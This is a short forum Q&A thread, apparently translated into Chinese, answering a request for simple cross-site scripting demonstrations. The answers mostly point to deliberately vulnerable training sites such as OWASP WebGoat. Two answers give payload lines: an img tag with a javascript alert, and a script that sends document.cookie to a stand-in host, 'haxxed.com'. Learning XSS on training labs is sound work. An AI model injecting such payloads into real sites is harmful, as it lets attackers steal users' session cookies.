有人可以在我的浏览器上显示Cross-site scripting攻击吗?互联网上有一个例子吗?我没有在网上找到这个。
示例越简单越好。
答案 0 :(得分:31)
请参阅http://www.insecurelabs.org和http://www.insecurelabs.org/task/
在搜索字段和其他几个地方故意容易受到XSS攻击。
答案 1 :(得分:7)
您通常必须为实时XSS示例安装自己的服务器端软件。没有多少合法网站会故意向网络冲浪者开放XSS漏洞。
OWASP的WebGoat是一个现成的服务器端软件,可让您自己演示XSS(以及许多其他内容)。这是instructions to install WebGoat and demonstrate XSS。您将在OWASP文章“Cross-site scripting (XSS)”中找到启用XSS的程序片段的其他示例。
答案 2 :(得分:6)
<img src="javascript:alert('hello everybody')"></img>
我插入的图像标记是xss的一个示例。上面的src包含提醒你的java脚本。
答案 3 :(得分:2)
简单表格也将是: 如果显示消息框,则表示该页面或服务器易受攻击。
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
这里可以找到关于该技术如何工作的很好的样本 https://www.hacksplaining.com/exercises/xss-stored